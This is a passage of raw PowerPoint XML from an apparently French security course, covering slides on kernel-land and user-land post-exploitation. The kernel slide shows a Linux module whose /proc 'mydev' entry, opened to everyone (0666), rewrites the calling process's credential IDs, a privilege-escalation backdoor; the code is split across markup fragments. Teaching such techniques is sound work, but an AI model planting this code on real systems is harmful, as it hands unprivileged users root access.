            <a:off x="1249679" y="3970021"/>
            <a:ext cx="1787256" cy="2577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mj-lt"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="ZoneTexte 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A203F0A1-11A3-51B1-D3A5-FB394EB38E11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365126" y="1152622"/>
            <a:ext cx="8509659" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On change les droits du processus courant en modifiant la structure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>cred</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="ZoneTexte 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94C1CD19-7D6E-8CF2-AACF-9376796D74C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249678" y="1590963"/>
            <a:ext cx="1789040" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>start of stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F03043EB-C114-F5DE-78BF-1FA28870963B}"/>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55" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCF456CD-6FA7-A554-1EF7-D57B1E444CD8}"/>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Post-exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65927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5ADBA28-77ED-8FAD-E45C-B5798B830893}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C85EAC8D-B31B-02B0-D752-F5E465C6C061}"/>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02216705-04DC-0DDA-F869-36DA6CA3BE1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Post-exploitation : Kernel-land</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADA23571-83EF-3C54-9B3B-50CB5FC5CC24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631185" y="1202363"/>
            <a:ext cx="8147689" cy="3647152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>static</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ssize_t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myread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> file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file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8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> __user </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ubuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count</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loff_t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ppos</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct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get_current</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cred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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uid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br>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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gid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p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      </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euid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p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      </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egid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p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      </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suid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p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      </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creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sgid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0" err="1">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val</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00"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</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80"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="8000FF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct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file_operations</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myops</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00"/>
                </a:solidFill>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owner</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THIS_MODULE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00"/>
                </a:solidFill>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read</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myread</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00"/>
                </a:solidFill>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write</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mywrite</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endParaRPr lang="fr-FR" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050"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init_module</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printk</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KERN_INFO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inserted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proc_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"mydev"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0666</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>myops</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00"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1050" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6918029-8FB7-8ED6-9711-1F5D2E461B19}"/>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1" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83EE3C5-1822-AF85-3A33-467D2B2B551E}"/>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Post-exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3939338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772D98-DE96-D84C-AF10-500A4A86C52F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0980D75C-2882-DF84-0774-A2A40DF4CA07}"/>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90C90081-5889-4239-D126-0DDFD42AF247}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Post-exploitation : User-land</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81ED126A-1E0D-D25C-E094-F01A1F1F01C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631185" y="1426225"/>
            <a:ext cx="8147690" cy="2800767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
